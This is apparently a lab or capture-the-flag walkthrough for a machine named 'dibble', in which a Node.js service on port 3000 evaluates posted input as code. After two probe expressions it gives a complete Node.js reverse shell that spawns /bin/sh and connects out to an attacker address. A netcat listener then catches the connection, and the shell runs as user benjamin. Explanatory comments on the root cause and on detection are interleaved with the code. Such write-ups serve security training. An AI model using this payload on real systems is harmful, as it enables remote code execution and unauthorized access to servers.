7 :3000 nodejs exploit
# As established earlier, :3000 is running Node.js
# Posting the expression 1+1 and checking whether the server evaluates it
User: k1 Event log: 2
# try a js function code
// Second probe: a self-invoking function expression. Its return value can
// only show up in the response if the server executes the posted body as
// JavaScript rather than treating it as data (the event log below shows 4).
(function(){
return 2+2;
})();
User: k2 Event log: 4
# The posted input is being evaluated as code; the event log shows the result.
# Node.js reverse shell
Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs
// Impact demonstration for the code-evaluation flaw confirmed above: because
// the server evaluates the posted body, a client can load Node core modules
// and spawn a process with the privileges of the Node service. The mechanism
// on the server side is not visible here (presumably eval()/new Function()/vm
// on request data — confirm in the application source). Root-cause fix: never
// evaluate request input; parse it with JSON.parse or a schema validator, and
// run the service as an unprivileged user so an injection stays contained.
(function(){
var net = require("net"),          // require() is reachable, so the evaluation runs in the server's module scope
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);      // shell runs as the Node process user (benjamin, per the id output below)
var client = new net.Socket();
client.connect(3000, "192.168.49.213", function(){  // outbound TCP from the app server; egress filtering and outbound-connection alerting detect this
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
$ nc -lvnp 3000
listening on [any] 3000 ...
connect to [192.168.49.213] from (UNKNOWN) [192.168.213.110] 48194
whoami;id;hostname;uname -a
benjamin
uid=1000(benjamin) gid=1000(benjamin) groups=1000(benjamin)
dibble
Linux dibble 5.8.10-200.fc32.x86_64 #1 SMP Thu Sep 17 16:48:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux